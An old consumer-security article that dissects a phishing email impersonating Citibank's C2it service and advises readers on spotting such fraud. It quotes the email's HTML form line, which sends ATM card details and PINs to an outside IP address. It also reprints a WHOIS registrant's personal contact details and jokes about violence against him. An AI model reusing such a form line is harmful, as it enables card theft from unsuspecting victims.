ED#19 : Beware! Fake C2it Spam On The Loose!

Although spam mails are a real nuisance, some are actually downright dangerous!

I recently received an e-mail that purported to be from C2it of Citibank. According to that e-mail, we have just received money transfer worth $217 from someone called Andreas. Wow... :)

C2it.com service would like to inform you, that you received money transfer from Andreas ([email protected]). Amount is $217.

But the next sentence made me very suspicious :-

In order to receive that amount from c2it.com you have to register your ATM card to prove you are our customer.

No respectable financial service will ever ask you to prove that you are a customer by registering your ATM card!

The third sentence made me even more suspicious :-

Your e-mail is not registred with us, you need to setup account with us and verify your identity. Please fill this form to be enrolled to c2it.com service.

Why? Whoever wrote this e-mail made a spelling mistake (registred) and had rather bad grammar. I doubt C2it staff would ever make such obvious mistakes.

Of course, as mentioned earlier, no respectable financial service will ever ask you to share your card details via e-mail. But look - this e-mail even includes a form for your ATM card details, including its PIN number!!! If that is not a dead giveaway for fraud, I don't know what is.

The rest of the e-mail looked authentic enough, with the correct layout and graphics. Check it out and see for yourself!

The "C2it" E-Mail

Click to see the full picture!

On Dissection

To confirm, I checked the e-mail's HTML code.

As expected, all the images used in the e-mail were taken from the C2it.com server. Not only that ensured that the e-mail looked authentic, it also meant that they cannot be used to point anyone to the sender.

However, the ATM card details have to be sent somewhere for the sender to make use of them. Especially since the e-mail used a form for added authenticity. A quick scan revealed this :-

<form action="http://211.206.197.57:65080/cgi-bin/c2it.php" method="get">

As you can see, the form was set to deliver the details NOT to C2it.com, but to a server with the IP of 211.206.197.57!

But on checking the IP, looks like the sender has flown the coop. The server was no longer there. But it did reveal something interesting. The sender apparently used the webserver.braenstone.com proxy server to mask his/her real IP.

Still, there are ways of finding out who registered the IP.

A WHOIS check revealed :-

IP Address : 211.206.190.0-211.206.199.255
Network Name : HANANET-LLINE-SUNCHUNAC-CN
Connect ISP Name : HANANET
Connect Date : 20001205
Registration Date : 20010303

[ Organization Information ]
Orgnization ID : ORG203614
Org Name : SUNCHUNAC-CN
State : CHONNAM
Address : 224-9, Dukwol-dong, Sunchon-si
Zip Code : 540-743

[ Admin Contact Information]
Name : Jungjun LEE
Org Name : SUNCHUNAC-CN
State : CHONNAM
Address : 224-9, Dukwol-dong, Sunchon-si
Zip Code : 540-743
Phone : +82-661-740-7171
Fax : +82-661-740-7173
E-Mail : [email protected]

[ Technical Contact Information ]
Name : Jungjun LEE
Org Name : SUNCHUNAC-CN
State : CHONNAM
Address : 224-9, Dukwol-dong, Sunchon-si
Zip Code : 540-743
Phone : +82-661-740-7171
Fax : +82-661-740-7173
E-Mail : [email protected]

Looks like it is a Korean server. It should be easy to track down the person who registered the IP and beat the heck out of him!

Of course, since they are targeting American ATM card holders, they must have some American associates. They would be harder to catch hold of, unless you have applied sufficient "pressure" on their Korean friends!

Oh well, at least we confirmed that this e-mail is a fraudulent attempt in getting hold of your ATM card details! :)

If you actually replied to the fake C2it.com e-mail above, please call your bank immediately! Get them to cancel your ATM card right away!

Conclusion

Although there is nothing really I can do about this email, at least I have proven that this e-mail is not what it seems. Next time you get an e-mail from financial services like C2it.com or PayPal.com, make sure you read it properly. And if you are unsure about its authenticity, e-mail them directly or call them and ask about the e-mail. Just don't use the reply e-mail address provided by the e-mail!

But no matter what, NEVER EVER provide your credit card or ATM card details via e-mail or forms within e-mails. If your financial service requires something from you, you will be asked to log in at their website. They will NEVER e-mail you a form for your convenience!

Finally, you should always remember one adage when it comes to such e-mails - if it sounds too good to be true, it often is too good to be true! Remember, there is no such thing as a free lunch. Although in this case, Andreas was sending just $217 to you, you have to ask yourself, why would Andreas send you any money at all?? Doesn't make sense, does it?

As you can see, spams can be more than just annoying. They can be very dangerous sometimes. If you are careful and have a high degree of suspicion, there should not be any danger. The key is to be vigilant when it comes to e-mails like this one. Of course, we always recommend that you use a good spam filter to prevent such junk from even entering your Inbox.

For more information on spam and how to combat spam, check out our Spam - The Digital Pest article!

Submission & Questions

If you have any questions regarding this article, please post them here!